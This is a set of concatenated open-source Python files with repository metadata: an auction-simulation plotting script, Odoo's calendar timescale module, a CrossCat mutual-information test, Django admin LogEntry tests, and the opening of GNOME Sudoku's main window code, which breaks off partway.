filenameNoiseAdd = "results/random-noise-{}traders-{}units-additive.csv".format(numOfTraderss[-1],maxNumOfUnitsPerTraders[3])
if createResults:
keyColumns=("numOfTraders","minNumOfUnitsPerTrader","maxNumOfUnitsPerTrader","maxNoiseSize")
### non-additive
simulateAuctions(randomAuctions( ### as function of #traders
numOfAuctions, numOfTraderss, minNumOfUnitsPerTrader, maxNumOfUnitsPerTraders[-1:], meanValue, maxNoiseSizes[-1:], fixedNumOfVirtualTraders=True),
filenameTraders, keyColumns=keyColumns)
simulateAuctions(randomAuctions( ### as function of m - fixed total units
numOfAuctions, numOfTraderss[-1:], minNumOfUnitsPerTrader, maxNumOfUnitsPerTraders, meanValue, maxNoiseSizes[-1:], fixedNumOfVirtualTraders=True),
filenameUnitsFixedVirtual, keyColumns=keyColumns)
# simulateAuctions(randomAuctions( ### as function of m - fixed total traders - TOO LONG
# numOfAuctions, [100], minNumOfUnitsPerTrader, maxNumOfUnitsPerTraders, meanValue, maxNoiseSizes[-1:], fixedNumOfVirtualTraders=False),
# filenameUnitsFixedTraders, keyColumns=keyColumns)
simulateAuctions(randomAuctions( ### as function of noise
numOfAuctions, numOfTraderss[-1:], minNumOfUnitsPerTrader, maxNumOfUnitsPerTraders[-1:], meanValue, maxNoiseSizes, fixedNumOfVirtualTraders=True),
filenameNoise, keyColumns=keyColumns)
### additive
# simulateAuctions(randomAuctions( ### as function of #traders
# numOfAuctions, numOfTraderss, maxNumOfUnitsPerTraders[3], maxNumOfUnitsPerTraders[-1:], meanValue, maxNoiseSizes[-1:], fixedNumOfVirtualTraders=True),
# filenameTradersAdd, keyColumns=keyColumns)
# # simulateAuctions(randomAuctions( ### as function of m - fixed total units
# # numOfAuctions, numOfTraderss[-1:], maxNumOfUnitsPerTraders, meanValue, maxNoiseSizes[-1:],isAdditive=True, fixedNumOfVirtualTraders=True),
# # filenameUnitsAdd, keyColumns=keyColumns)
# simulateAuctions(randomAuctions( ### as function of noise
# numOfAuctions, numOfTraderss[-1:], maxNumOfUnitsPerTraders[3], maxNumOfUnitsPerTraders[-1:], meanValue, maxNoiseSizes, fixedNumOfVirtualTraders=True),
# filenameNoiseAdd, keyColumns=keyColumns)
# # simulateAuctions(randomAuctions( ### as function of m - fixed total traders
# # numOfAuctions, [100], maxNumOfUnitsPerTraders, meanValue, maxNoiseSizes[-1:], isAdditive=True, fixedNumOfVirtualTraders=False),
# # filenameUnitsFixedTraders, keyColumns=keyColumns)
TITLESTART = ""# "Uniform; "
### non-additive
ax=plt.subplot(1,2,1)
plotResults(filenameTraders,"Total traders",numOfBins, ax, title=
TITLESTART+"m={},M={},noise={}".format(minNumOfUnitsPerTrader,maxNumOfUnitsPerTraders[-1],maxNoiseSizes[-1]))
ax.set_xlabel('Total #traders', fontsize=axesFontSize)
ax.set_xlim([0,1000])
# ax=plt.subplot(1,1,1)
# plotResults(filenameTraders,"Optimal units",numOfBins, ax, title=
# TITLESTART+"m={},M={},noise={}".format(minNumOfUnitsPerTrader,maxNumOfUnitsPerTraders[3],maxNoiseSizes[-1]))
# plt.xlabel('Optimal #units (k)')
# plt.show()
ax=plt.subplot(1,2,2, sharey=None)
plotResults(filenameUnitsFixedVirtual,"log10(M)",numOfBins=None, ax=ax, title=TITLESTART+"m={},units={},noise={}".format(minNumOfUnitsPerTrader,numOfTraderss[-1],maxNoiseSizes[-1]))
#labels = [""]+["{:.0e}".format(t) for t in sorted(maxNumOfUnitsPerTraders)]
ax.set_xlim([1,8])
ax.set_xticklabels(["","100","1e3","1e4","1e5","1e6","1e7","1e8"])
ax.set_xlabel('Max #units per trader (M)', fontsize=axesFontSize)
ax.set_ylabel("")
plt.show()
# plotResults(filenameUnitsFixedTraders,"maxNumOfUnitsPerTrader",numOfBins, plt.subplot(1,1,1),
# title="traders={}, noise={}".format(numOfTraderss[-1],maxNoiseSizes[-1]))
# plt.xlabel('#units per trader (M)')
# plt.show()
# plotResults(filenameNoise,"maxNoiseSize",numOfBins, plt.subplot(1,1,1),
# title=TITLESTART+"units={},m={},M={}".format(numOfTraderss[-1],minNumOfUnitsPerTrader,maxNumOfUnitsPerTraders[3]))
# plt.xlabel('Max noise size (A)', fontsize=axesFontSize)
# plt.show()
### additive
# # plotResults(filenameTradersAdd,"numOfTraders",numOfBins, plt.subplot(1,1,1), title=TITLESTART+"m={},M={},n oise={}, additive".format(minNumOfUnitsPerTrader,maxNumOfUnitsPerTraders[3],maxNoiseSizes[-1]))
# # plt.xlabel('total #units')
# plotResults(filenameTradersAdd,"Optimal units",numOfBins, plt.subplot(1,1,1),
# title=TITLESTART+"m={},M={},noise={},additive".format(minNumOfUnitsPerTrader, maxNumOfUnitsPerTraders[3],maxNoiseSizes[-1]))
# plt.xlabel('optimal #units (k)')
# plt.show()
#
# # plotResults(filenameUnitsAdd,"maxNumOfUnitsPerTrader",numOfBins, plt.subplot(1,1,1),
# # title=TITLESTART+"traders={},noise={},additive".format(numOfTraderss[-1],maxNoiseSizes[-1]))
# # plt.ylabel('')
# plotResults(filenameNoiseAdd,"maxNoiseSize",numOfBins, plt.subplot(1,1,1),
# title=TITLESTART+"traders={},m={},M={},additive".format(numOfTraderss[-1],minNumOfUnitsPerTrader, maxNumOfUnitsPerTraders[3]))
# plt.xlabel('Max noise size (A)')
# plt.show()
createResults = False # True #
torqSimulation()
randomSimulation(numOfAuctions = 10)
| lgpl-2.1 |
papouso/odoo | addons/resource/faces/timescale.py | 263 | 3899 | ############################################################################
# Copyright (C) 2005 by Reithinger GmbH
# mreithinger@web.de
#
# This file is part of faces.
#
# faces is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# faces is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
############################################################################
import faces.pcalendar as pcal
import openerp.tools as tools
import datetime
import sys
class TimeScale(object):
def __init__(self, calendar):
self.data_calendar = calendar
self._create_chart_calendar()
self.now = self.to_num(self.data_calendar.now)
def to_datetime(self, xval):
return xval.to_datetime()
def to_num(self, date):
return self.chart_calendar.WorkingDate(date)
def is_free_slot(self, value):
dt1 = self.chart_calendar.to_starttime(value)
dt2 = self.data_calendar.to_starttime\
(self.data_calendar.from_datetime(dt1))
return dt1 != dt2
def is_free_day(self, value):
dt1 = self.chart_calendar.to_starttime(value)
dt2 = self.data_calendar.to_starttime\
(self.data_calendar.from_datetime(dt1))
return dt1.date() != dt2.date()
def _create_chart_calendar(self):
dcal = self.data_calendar
ccal = self.chart_calendar = pcal.Calendar()
ccal.minimum_time_unit = 1
        # pad the work-time slots of the calendar so that all days are equally long
slot_sum = lambda slots: sum(map(lambda slot: slot[1] - slot[0], slots))
day_sum = lambda day: slot_sum(dcal.get_working_times(day))
max_work_time = max(map(day_sum, range(7)))
        # working time should occupy 2/3 of the padded day, hence sum_time = 3/2 * max_work_time
sum_time = 3 * max_work_time / 2
        # now create the time slots for ccal
def create_time_slots(day):
src_slots = dcal.get_working_times(day)
slots = [0, src_slots, 24*60]
slots = tuple(tools.flatten(slots))
slots = zip(slots[:-1], slots[1:])
            # spread the padding across the non-working slots
work_time = slot_sum(src_slots)
non_work_time = sum_time - work_time
non_slots = filter(lambda s: s not in src_slots, slots)
non_slots = map(lambda s: (s[1] - s[0], s), non_slots)
non_slots.sort()
slots = []
i = 0
for l, s in non_slots:
delta = non_work_time / (len(non_slots) - i)
delta = min(l, delta)
non_work_time -= delta
slots.append((s[0], s[0] + delta))
i += 1
slots.extend(src_slots)
slots.sort()
return slots
min_delta = sys.maxint
for i in range(7):
slots = create_time_slots(i)
ccal.working_times[i] = slots
min_delta = min(min_delta, min(map(lambda s: s[1] - s[0], slots)))
ccal._recalc_working_time()
self.slot_delta = min_delta
self.day_delta = sum_time
self.week_delta = ccal.week_time
_default_scale = TimeScale(pcal._default_calendar)
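
# Minimal usage sketch (relies only on the API above):
#   ts = TimeScale(pcal._default_calendar)
#   x = ts.to_num(ts.data_calendar.now)   # chart-calendar coordinate for "now"
#   ts.is_free_day(x)                     # True when x maps onto a non-working day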
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
probcomp/crosscat | scripts/mi_tests/test_mutual_information.py | 2 | 6434 | #
# Copyright (c) 2010-2016, MIT Probabilistic Computing Project
#
# Lead Developers: Dan Lovell and Jay Baxter
# Authors: Dan Lovell, Baxter Eaves, Jay Baxter, Vikash Mansinghka
# Research Leads: Vikash Mansinghka, Patrick Shafto
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# calculated the mutual information of various shapes of data
import numpy
import pylab as pl
import crosscat.utils.sample_utils as su
import crosscat.utils.inference_utils as iu
import crosscat.utils.data_utils as du
import crosscat.cython_code.State as State
import random
import math
def ring(n=200):
X = numpy.zeros((n,2))
for i in range(n):
angle = random.uniform(0,2*math.pi)
distance = random.uniform(1,1.5)
X[i,0] = math.cos(angle)*distance
X[i,1] = math.sin(angle)*distance
return X
def circle(n=200):
X = numpy.zeros((n,2))
for i in range(n):
angle = random.uniform(0,2*math.pi)
distance = random.uniform(0,1.5)
X[i,0] = math.cos(angle)*distance
X[i,1] = math.sin(angle)*distance
return X
def square(n=200):
X = numpy.zeros((n,2))
for i in range(n):
x = random.uniform(-1,1)
y = random.uniform(-1,1)
X[i,0] = x
X[i,1] = y
return X
def diamond(n=200):
X = square(n=n)
for i in range(n):
        angle = math.atan2(X[i,1], X[i,0])  # atan2 keeps the quadrant and avoids division by zero when X[i,0] == 0
angle += math.pi/4
hyp = (X[i,0]**2.0+X[i,1]**2.0)**.5
x = math.cos(angle)*hyp
y = math.sin(angle)*hyp
X[i,0] = x
X[i,1] = y
return X
def four_dots(n=200):
X = numpy.zeros((n,2))
nb = n/4
mx = [ -1, 1, -1, 1]
my = [ -1, -1, 1, 1]
s = .25
for i in range(n):
        b = random.randrange(4)  # pick one of the four blobs (avoid shadowing the parameter n)
        x = random.normalvariate(mx[b], s)
        y = random.normalvariate(my[b], s)
X[i,0] = x
X[i,1] = y
return X
def correlated(r,n=200):
X = numpy.random.multivariate_normal([0,0], [[1, r],[r, 1]], n)
return X
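
# For reference: with unit marginal variances, the covariance matrix [[1, r], [r, 1]]
# gives Pearson correlation exactly r; quick illustrative check:
#   X = correlated(0.9, n=2000); numpy.corrcoef(X.T)[0, 1]   # ~= 0.9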
def sample_from_view(M_c, X_L, X_D, get_next_seed):
view_col = X_L['column_partition']['assignments'][0]
view_col2 = X_L['column_partition']['assignments'][1]
same_view = True
if view_col2 != view_col:
same_view = False
view_state = X_L['view_state'][view_col]
view_state2 = X_L['view_state'][view_col2]
cluster_crps = numpy.exp(su.determine_cluster_crp_logps(view_state))
cluster_crps2 = numpy.exp(su.determine_cluster_crp_logps(view_state2))
assert( math.fabs(numpy.sum(cluster_crps) - 1) < .00000001 )
cluster_idx1 = numpy.nonzero(numpy.random.multinomial(1, cluster_crps))[0][0]
cluster_model1 = su.create_cluster_model_from_X_L(M_c, X_L, view_col, cluster_idx1)
if same_view:
cluster_idx2 = cluster_idx1
cluster_model2 = cluster_model1
else:
cluster_idx2 = numpy.nonzero(numpy.random.multinomial(1, cluster_crps2))[0][0]
cluster_model2 = su.create_cluster_model_from_X_L(M_c, X_L, view_col2, cluster_idx2)
component_model1 = cluster_model1[0]
x = component_model1.get_draw(get_next_seed())
component_model2 = cluster_model2[1]
y = component_model2.get_draw(get_next_seed())
return x, y
def sample_data_from_crosscat(M_c, X_Ls, X_Ds, get_next_seed, n):
X = numpy.zeros((n,2))
n_samples = len(X_Ls)
for i in range(n):
cc = random.randrange(n_samples)
x, y = sample_from_view(M_c, X_Ls[cc], X_Ds[cc], get_next_seed)
X[i,0] = x
X[i,1] = y
return X
def do_test(which_plot, max_plots, n, burn_in, cc_samples, which_test, correlation=0, do_plot=False):
if which_test is "correlated":
X = correlated(correlation, n=n)
elif which_test is "square":
X = square(n=n)
elif which_test is "ring":
X = ring(n=n)
elif which_test is "circle":
X = circle(n=n)
elif which_test is "diamond":
X = diamond(n=n)
elif which_test is "blob":
X = correlated(0.0, n=n)
elif which_test is "dots":
X = four_dots(n=n)
elif which_test is "mixed":
X = numpy.vstack((correlated(.95, n=n/2),correlated(0, n=n/2)))
get_next_seed = lambda : random.randrange(32000)
# Build a state
M_c = du.gen_M_c_from_T(X.tolist())
state = State.p_State(M_c, X.tolist())
X_Ls = []
X_Ds = []
# collect crosscat samples
for _ in range(cc_samples):
state = State.p_State(M_c, X.tolist())
state.transition(n_steps=burn_in)
X_Ds.append(state.get_X_D())
X_Ls.append(state.get_X_L())
SX = sample_data_from_crosscat(M_c, X_Ls, X_Ds, get_next_seed, n)
if do_plot:
pl.subplot(2,max_plots,which_plot)
pl.scatter(X[:,0],X[:,1],c='blue',alpha=.5)
pl.title("Original data")
pl.subplot(2,max_plots,max_plots+which_plot)
pl.scatter(SX[:,0],SX[:,1],c='red',alpha=.5)
pl.title("Sampled data")
        pl.show()
return M_c, X_Ls, X_Ds
def MI_test(n, burn_in, cc_samples, which_test, n_MI_samples=500, correlation=0):
get_next_seed = lambda : random.randrange(32000)
    M_c, X_Ls, X_Ds = do_test(0, 0, n, burn_in, cc_samples, which_test, correlation=correlation, do_plot=False)
# query column 0 and 1
MI, Linfoot = iu.mutual_information(M_c, X_Ls, X_Ds, [(0,1)],
get_next_seed, n_samples=n_MI_samples)
MI = numpy.mean(MI)
Linfoot = numpy.mean(Linfoot)
if which_test == "correlated":
test_strn = "Test: correlation (%1.2f), N: %i, burn_in: %i, samples: %i, MI_samples: %i\n\tMI: %f, Linfoot %f" % (correlation, n, burn_in, cc_samples, n_MI_samples, MI, Linfoot)
else:
test_strn = "Test: %s, N: %i, burn_in: %i, samples: %i, MI_samples: %i\n\tMI: %f, Linfoot %f" % (which_test, n, burn_in, cc_samples, n_MI_samples, MI, Linfoot)
print(test_strn)
return test_strn
do_plot = False
n_mi_samples = 500
N = [10, 100, 1000]
burn_in = 200
cc_samples = 10
print(" ")
for n in N:
strn = MI_test(n, burn_in, cc_samples, "correlated", correlation=.3)
strn = MI_test(n, burn_in, cc_samples, "correlated", correlation=.6)
strn = MI_test(n, burn_in, cc_samples, "correlated", correlation=.9)
strn = MI_test(n, burn_in, cc_samples, "ring")
strn = MI_test(n, burn_in, cc_samples, "dots")
strn = MI_test(n, burn_in, cc_samples, "mixed")
| apache-2.0 |
kawamon/hue | desktop/core/ext-py/Django-1.11.29/tests/admin_utils/test_logentry.py | 5 | 11611 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from datetime import datetime
from django.contrib.admin.models import ADDITION, CHANGE, DELETION, LogEntry
from django.contrib.admin.utils import quote
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.test import TestCase, override_settings
from django.urls import reverse
from django.utils import six, translation
from django.utils.encoding import force_bytes
from django.utils.html import escape
from .models import Article, ArticleProxy, Site
@override_settings(ROOT_URLCONF='admin_utils.urls')
class LogEntryTests(TestCase):
def setUp(self):
self.user = User.objects.create_superuser(username='super', password='secret', email='super@example.com')
self.site = Site.objects.create(domain='example.org')
self.a1 = Article.objects.create(
site=self.site,
title="Title",
created=datetime(2008, 3, 12, 11, 54),
)
content_type_pk = ContentType.objects.get_for_model(Article).pk
LogEntry.objects.log_action(
self.user.pk, content_type_pk, self.a1.pk, repr(self.a1), CHANGE,
change_message='Changed something'
)
self.client.force_login(self.user)
def test_logentry_save(self):
"""
LogEntry.action_time is a timestamp of the date when the entry was
created. It shouldn't be updated on a subsequent save().
"""
logentry = LogEntry.objects.get(content_type__model__iexact="article")
action_time = logentry.action_time
logentry.save()
self.assertEqual(logentry.action_time, action_time)
def test_logentry_change_message(self):
"""
LogEntry.change_message is stored as a dumped JSON structure to be able
to get the message dynamically translated at display time.
"""
post_data = {
'site': self.site.pk, 'title': 'Changed', 'hist': 'Some content',
'created_0': '2008-03-12', 'created_1': '11:54',
}
change_url = reverse('admin:admin_utils_article_change', args=[quote(self.a1.pk)])
response = self.client.post(change_url, post_data)
self.assertRedirects(response, reverse('admin:admin_utils_article_changelist'))
logentry = LogEntry.objects.filter(content_type__model__iexact='article').latest('id')
self.assertEqual(logentry.get_change_message(), 'Changed title and hist.')
with translation.override('fr'):
self.assertEqual(logentry.get_change_message(), 'Modification de title et hist.')
add_url = reverse('admin:admin_utils_article_add')
post_data['title'] = 'New'
response = self.client.post(add_url, post_data)
self.assertRedirects(response, reverse('admin:admin_utils_article_changelist'))
logentry = LogEntry.objects.filter(content_type__model__iexact='article').latest('id')
self.assertEqual(logentry.get_change_message(), 'Added.')
with translation.override('fr'):
self.assertEqual(logentry.get_change_message(), 'Ajout.')
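
    # For reference: the stored change_message for the title/hist edit above is a JSON
    # list like [{"changed": {"fields": ["title", "hist"]}}]; the formset test below
    # exercises the richer added/changed/deleted variants.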
@override_settings(USE_L10N=True)
def test_logentry_change_message_localized_datetime_input(self):
"""
Localized date/time inputs shouldn't affect changed form data detection.
"""
post_data = {
'site': self.site.pk, 'title': 'Changed', 'hist': 'Some content',
'created_0': '12/03/2008', 'created_1': '11:54',
}
with translation.override('fr'):
change_url = reverse('admin:admin_utils_article_change', args=[quote(self.a1.pk)])
response = self.client.post(change_url, post_data)
self.assertRedirects(response, reverse('admin:admin_utils_article_changelist'))
logentry = LogEntry.objects.filter(content_type__model__iexact='article').latest('id')
self.assertEqual(logentry.get_change_message(), 'Changed title and hist.')
def test_logentry_change_message_formsets(self):
"""
All messages for changed formsets are logged in a change message.
"""
a2 = Article.objects.create(
site=self.site,
title="Title second article",
created=datetime(2012, 3, 18, 11, 54),
)
post_data = {
'domain': 'example.com', # domain changed
'admin_articles-TOTAL_FORMS': '5',
'admin_articles-INITIAL_FORMS': '2',
'admin_articles-MIN_NUM_FORMS': '0',
'admin_articles-MAX_NUM_FORMS': '1000',
# Changed title for 1st article
'admin_articles-0-id': str(self.a1.pk),
'admin_articles-0-site': str(self.site.pk),
'admin_articles-0-title': 'Changed Title',
# Second article is deleted
'admin_articles-1-id': str(a2.pk),
'admin_articles-1-site': str(self.site.pk),
'admin_articles-1-title': 'Title second article',
'admin_articles-1-DELETE': 'on',
# A new article is added
'admin_articles-2-site': str(self.site.pk),
'admin_articles-2-title': 'Added article',
}
change_url = reverse('admin:admin_utils_site_change', args=[quote(self.site.pk)])
response = self.client.post(change_url, post_data)
self.assertRedirects(response, reverse('admin:admin_utils_site_changelist'))
self.assertQuerysetEqual(Article.objects.filter(pk=a2.pk), [])
logentry = LogEntry.objects.filter(content_type__model__iexact='site').latest('action_time')
self.assertEqual(
json.loads(logentry.change_message),
[
{"changed": {"fields": ["domain"]}},
{"added": {"object": "Article object", "name": "article"}},
{"changed": {"fields": ["title"], "object": "Article object", "name": "article"}},
{"deleted": {"object": "Article object", "name": "article"}},
]
)
self.assertEqual(
logentry.get_change_message(),
'Changed domain. Added article "Article object". '
'Changed title for article "Article object". Deleted article "Article object".'
)
with translation.override('fr'):
self.assertEqual(
logentry.get_change_message(),
"Modification de domain. Ajout de article « Article object ». "
"Modification de title pour l'objet article « Article object ». "
"Suppression de article « Article object »."
)
def test_logentry_get_edited_object(self):
"""
LogEntry.get_edited_object() returns the edited object of a LogEntry
object.
"""
logentry = LogEntry.objects.get(content_type__model__iexact="article")
edited_obj = logentry.get_edited_object()
self.assertEqual(logentry.object_id, str(edited_obj.pk))
def test_logentry_get_admin_url(self):
"""
LogEntry.get_admin_url returns a URL to edit the entry's object or
None for non-existent (possibly deleted) models.
"""
logentry = LogEntry.objects.get(content_type__model__iexact='article')
expected_url = reverse('admin:admin_utils_article_change', args=(quote(self.a1.pk),))
self.assertEqual(logentry.get_admin_url(), expected_url)
self.assertIn('article/%d/change/' % self.a1.pk, logentry.get_admin_url())
logentry.content_type.model = "non-existent"
self.assertIsNone(logentry.get_admin_url())
def test_logentry_unicode(self):
log_entry = LogEntry()
log_entry.action_flag = ADDITION
self.assertTrue(six.text_type(log_entry).startswith('Added '))
log_entry.action_flag = CHANGE
self.assertTrue(six.text_type(log_entry).startswith('Changed '))
log_entry.action_flag = DELETION
self.assertTrue(six.text_type(log_entry).startswith('Deleted '))
# Make sure custom action_flags works
log_entry.action_flag = 4
self.assertEqual(six.text_type(log_entry), 'LogEntry Object')
def test_log_action(self):
content_type_pk = ContentType.objects.get_for_model(Article).pk
log_entry = LogEntry.objects.log_action(
self.user.pk, content_type_pk, self.a1.pk, repr(self.a1), CHANGE,
change_message='Changed something else',
)
self.assertEqual(log_entry, LogEntry.objects.latest('id'))
def test_recentactions_without_content_type(self):
"""
If a LogEntry is missing content_type it will not display it in span
tag under the hyperlink.
"""
response = self.client.get(reverse('admin:index'))
link = reverse('admin:admin_utils_article_change', args=(quote(self.a1.pk),))
should_contain = """<a href="%s">%s</a>""" % (escape(link), escape(repr(self.a1)))
self.assertContains(response, should_contain)
should_contain = "Article"
self.assertContains(response, should_contain)
logentry = LogEntry.objects.get(content_type__model__iexact='article')
# If the log entry doesn't have a content type it should still be
# possible to view the Recent Actions part (#10275).
logentry.content_type = None
logentry.save()
counted_presence_before = response.content.count(force_bytes(should_contain))
response = self.client.get(reverse('admin:index'))
counted_presence_after = response.content.count(force_bytes(should_contain))
self.assertEqual(counted_presence_before - 1, counted_presence_after)
def test_proxy_model_content_type_is_used_for_log_entries(self):
"""
Log entries for proxy models should have the proxy model's contenttype
(#21084).
"""
proxy_content_type = ContentType.objects.get_for_model(ArticleProxy, for_concrete_model=False)
post_data = {
'site': self.site.pk, 'title': "Foo", 'hist': "Bar",
'created_0': '2015-12-25', 'created_1': '00:00',
}
changelist_url = reverse('admin:admin_utils_articleproxy_changelist')
# add
proxy_add_url = reverse('admin:admin_utils_articleproxy_add')
response = self.client.post(proxy_add_url, post_data)
self.assertRedirects(response, changelist_url)
proxy_addition_log = LogEntry.objects.latest('id')
self.assertEqual(proxy_addition_log.action_flag, ADDITION)
self.assertEqual(proxy_addition_log.content_type, proxy_content_type)
# change
article_id = proxy_addition_log.object_id
proxy_change_url = reverse('admin:admin_utils_articleproxy_change', args=(article_id,))
post_data['title'] = 'New'
response = self.client.post(proxy_change_url, post_data)
self.assertRedirects(response, changelist_url)
proxy_change_log = LogEntry.objects.latest('id')
self.assertEqual(proxy_change_log.action_flag, CHANGE)
self.assertEqual(proxy_change_log.content_type, proxy_content_type)
# delete
proxy_delete_url = reverse('admin:admin_utils_articleproxy_delete', args=(article_id,))
response = self.client.post(proxy_delete_url, {'post': 'yes'})
self.assertRedirects(response, changelist_url)
proxy_delete_log = LogEntry.objects.latest('id')
self.assertEqual(proxy_delete_log.action_flag, DELETION)
self.assertEqual(proxy_delete_log.content_type, proxy_content_type)
| apache-2.0 |
Alberto-Beralix/Beralix | i386-squashfs-root/usr/share/pyshared/gnome_sudoku/main.py | 1 | 40160 | # -*- coding: utf-8 -*-
import os.path
import threading
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk,GdkPixbuf,GObject,Pango,Gdk
from gi.repository import LaunchpadIntegration
from gettext import gettext as _
from gettext import ngettext
import cairo
import dialog_swallower
import game_selector
import gsudoku
import printing
import saver
import sudoku_maker
import timer
import tracker_info
from defaults import (APPNAME, APPNAME_SHORT, AUTHORS, COPYRIGHT, DESCRIPTION, DOMAIN,
IMAGE_DIR, MIN_NEW_PUZZLES, UI_DIR, VERSION, WEBSITE, WEBSITE_LABEL)
from gtk_goodies import gconf_wrapper, Undo, dialog_extras
from simple_debug import simple_debug, options
def inactivate_new_game_etc (fun):
def inactivate_new_game_etc_ (ui, *args, **kwargs):
paths = [
'/MenuBar/Game/New',
'/MenuBar/Game/Reset',
'/MenuBar/Game/PuzzleInfo',
'/MenuBar/Game/Print',
# undo/redo is handled elsewhere as it can't simply be turned on/off.
'/MenuBar/Settings/ToggleToolbar',
'/MenuBar/Settings/ToggleHighlight',
'/MenuBar/Settings/AlwaysShowPossible',
'/MenuBar/Settings/ShowImpossibleImplications',
'/MenuBar/Tools/ShowPossible',
'/MenuBar/Tools/ClearTopNotes',
'/MenuBar/Tools/ClearBottomNotes',
'/MenuBar/Tools/Tracker',
]
for p in paths:
action = ui.uimanager.get_action(p)
if not action:
action = ui.uimanager.get_widget(p)
if not action:
print 'No action at path', p
else:
action.set_sensitive(False)
ret = fun(ui, *args, **kwargs)
for p in paths:
action = ui.uimanager.get_action(p)
if not action:
action = ui.uimanager.get_widget(p)
if not action:
print 'No action at path', p
else:
action.set_sensitive(True)
return ret
return inactivate_new_game_etc_
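
# Usage sketch: decorate any UI callback that must not run concurrently with the
# menu actions listed above, e.g.
#   @inactivate_new_game_etc
#   def select_game(self): ...
# (select_game and new_cb below are decorated this way.)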
class UI (gconf_wrapper.GConfWrapper):
ui = '''<ui>
<menubar name="MenuBar">
<menu name="Game" action="Game">
<menuitem action="New"/>
<menuitem action="Reset"/>
<separator/>
<menuitem action="Undo"/>
<menuitem action="Redo"/>
<separator/>
<menuitem action="PuzzleInfo"/>
<separator/>
<menuitem action="Print"/>
<menuitem action="PrintMany"/>
<separator/>
<menuitem action="Close"/>
</menu>
<menu action="Settings">
<menuitem action="FullScreen"/>
<menuitem action="ToggleToolbar"/>
<separator/>
<menuitem action="ToggleHighlight"/>
<menuitem action="AlwaysShowPossible"/>
<menuitem action="ShowImpossibleImplications"/>
</menu>
<menu action="Tools">
<menuitem action="ShowPossible"/>
<separator/>
<menuitem action="ClearTopNotes"/>
<menuitem action="ClearBottomNotes"/>
<separator/>
<menuitem action="Tracker"/>
</menu>
<menu action="Help">
<menuitem action="ShowHelp"/>
<placeholder name='LaunchpadItems'/>
<menuitem action="About"/>
</menu>
</menubar>
<toolbar name="Toolbar">
<toolitem action="New"/>
<separator/>
<toolitem action="Undo"/>
<toolitem action="Redo"/>
<separator/>
<toolitem action="ShowPossible"/>
<separator/>
<toolitem action="Tracker"/>
</toolbar>
</ui>'''
initial_prefs = {'group_size':9,
'always_show_hints':False,
'difficulty':0.0,
'minimum_number_of_new_puzzles':MIN_NEW_PUZZLES,
'highlight':False,
'bg_color':'black',
'show_tracker':False,
'width': 700,
'height': 675,
'auto_save_interval':60 # auto-save interval in seconds...
}
@simple_debug
def __init__ (self, run_selector = True):
"""run_selector means that we start our regular game.
For testing purposes, it will be convenient to hand a
run_selector=False to this method to avoid running the dialog
and allow a tester to set up a game programmatically.
"""
gconf_wrapper.GConfWrapper.__init__(self,
gconf_wrapper.GConfWrap('gnome-sudoku')
)
self.setup_gui()
self.timer = timer.ActiveTimer(self.w)
self.gsd.set_timer(self.timer)
self.won = False
# add the accelerator group to our toplevel window
self.worker_connections = []
self.is_fullscreen = False
# setup sudoku maker...
self.sudoku_maker = sudoku_maker.SudokuMaker()
self.sudoku_tracker = saver.SudokuTracker()
# generate puzzles while our use is working...
self.show()
if run_selector:
self.do_stop()
if self.select_game():
# If this return True, the user closed...
self.quit = True
else:
self.quit = False
# Generate puzzles in background...
GObject.timeout_add_seconds(1, lambda *args: self.start_worker_thread() and True)
@inactivate_new_game_etc
def select_game (self):
self.tb.hide()
choice = game_selector.NewOrSavedGameSelector().run_swallowed_dialog(self.swallower)
if not choice:
return True
self.timer.start_timing()
if choice[0] == game_selector.NewOrSavedGameSelector.NEW_GAME:
self.gsd.change_grid(choice[1], 9)
if choice[0] == game_selector.NewOrSavedGameSelector.SAVED_GAME:
saver.open_game(self, choice[1])
if self.gconf['show_toolbar']:
self.tb.show()
if self.gconf['always_show_hints']:
self.gsd.update_all_hints()
if self.gconf['highlight']:
self.gsd.toggle_highlight(True)
def show (self):
self.gsd.show()
self.w.show()
def setup_gui (self):
self.initialize_prefs()
self.setup_main_window()
self.gsd = gsudoku.SudokuGameDisplay()
self.gsd.set_parent_for(self.w)
self.gsd.connect('puzzle-finished', self.you_win_callback)
self.setup_color()
self.setup_actions()
self.setup_undo()
self.setup_autosave()
self.w.add_accel_group(self.uimanager.get_accel_group())
# Add launchpad integration
LaunchpadIntegration.set_sourcepackagename("gnome-sudoku")
LaunchpadIntegration.add_ui(self.uimanager, "/MenuBar/Help/LaunchpadItems")
self.setup_main_boxes()
self.setup_tracker_interface()
self.setup_toggles()
def setup_main_window (self):
Gtk.Window.set_default_icon_name('gnome-sudoku')
self.w = Gtk.Window()
self.w.set_default_size(self.gconf['width'], self.gconf['height'])
self.w.set_title(APPNAME_SHORT)
self.w.connect('configure-event', self.resize_cb)
self.w.connect('delete-event', self.quit_cb)
self.uimanager = Gtk.UIManager()
def setup_actions (self):
self.main_actions = Gtk.ActionGroup('MainActions')
self.main_actions.add_actions([
('Game', None, _('_Game')),
('New', Gtk.STOCK_NEW, None, '<Control>n', _('New game'), self.new_cb),
('Reset', Gtk.STOCK_CLEAR, _('_Reset'), '<Control>b',
None, self.game_reset_cb),
('Undo', Gtk.STOCK_UNDO, _('_Undo'), '<Control>z',
_('Undo last action'), self.stop_dancer),
('Redo', Gtk.STOCK_REDO, _('_Redo'), '<Shift><Control>z',
_('Redo last action')),
('PuzzleInfo', Gtk.STOCK_ABOUT, _('Puzzle _Statistics...'), None,
None, self.show_info_cb),
